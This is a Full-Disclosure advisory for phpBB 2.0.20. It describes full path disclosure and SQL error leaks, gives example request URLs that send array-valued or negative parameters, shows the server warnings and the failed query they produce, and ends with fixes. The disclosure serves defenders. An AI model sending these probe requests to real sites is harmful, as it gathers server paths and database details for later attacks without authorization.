Source: http://securityreason.com/achievement_securityalert/38
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[phpBB 2.0.20 Full Path Disclosure and SQL Errors]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
from SecurityReason.Com
CVE:
— 0.Description —
phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB
has a
user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the
powerful PHP
server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the
ideal
free community solution for all web sites.
Contact with author http://www.phpbb.com/about.php.
…
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|ls", &str, &str_len, "e_style,
&hint_charset, &hint_charset_len) == FAILURE) {
return;
}
…
As you can see there is a protection from formatting input variable. If the variable is other than string,
we have error with Full Path Disclosure.
Example:
http://[HOST]/2020/phpBB2/memberlist.php?mode[]=cx
—Code —
if ( isset($HTTP_GET_VARS['mode']) || isset($HTTP_POST_VARS['mode']) )
{
$mode = ( isset($HTTP_POST_VARS['mode']) ) ? htmlspecialchars($HTTP_POST_VARS['mode']) :
htmlspecialchars($HTTP_GET_VARS['mode']);
}
else
{
$mode = 'joined';
}
—Code —
—Result —
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /www/2020/phpBB2/memberlist.php
on line 40
Warning: Cannot modify header information - headers already sent by (output started at
/www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 483
Warning: Cannot modify header information - headers already sent by (output started at
/www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 485
Warning: Cannot modify header information - headers already sent by (output started at
/www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 486
http://[HOST]/2020/phpBB2/viewtopic.php?t=2&highlight[]=cx
Warning: urlencode() expects parameter 1 to be string, array given in /www/2020/phpBB2/viewtopic.php on line
498
Warning: Cannot modify header information - headers already sent by (output started at
/www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 483
Warning: Cannot modify header information - headers already sent by (output started at
/www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 485
Warning: Cannot modify header information - headers already sent by (output started at
/www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 486
Problem appears if display_errors==1, but it exists on many websites. (even at php.net).
Problem appears because we can add everything (INT) to the end of SQL query (LIMIT). The query will fail if
the value is below 0 or above -2^32.
Example:
http://[HOST]/2020/phpBB2/memberlist.php?start=-1
—Code —
$start = ( isset($HTTP_GET_VARS['start']) ) ? intval($HTTP_GET_VARS['start']) : 0;
—Code —
—Result —
Could not query users
DEBUG MODE
SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near '-1, 50' at line 4
SELECT username, user_id, user_viewemail, user_posts, user_regdate, user_from, user_website, user_email,
user_icq, user_aim, user_yim, user_msnm, user_avatar, user_avatar_type, user_allowavatar FROM phpbb_users
WHERE user_id <> -1 ORDER BY user_regdate ASC LIMIT -1, 50
Line : 151
File : memberlist.php
—Result —
— 3. How to fix —
Turn off display_errors or use function like is_string().
— 4. Greets —
sp3x
Infospec, p_e_a, krasza, revival, l5x
iD8DBQFEW4pi3Ke13X/fTO4RAqV7AJ9PeZ9nbRUYATqArEzLOdenG1ypHwCguPa5
7DlqP3M3vq1frb7Zc3y+KrU=
=4U6Y
-----END PGP SIGNATURE-----
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/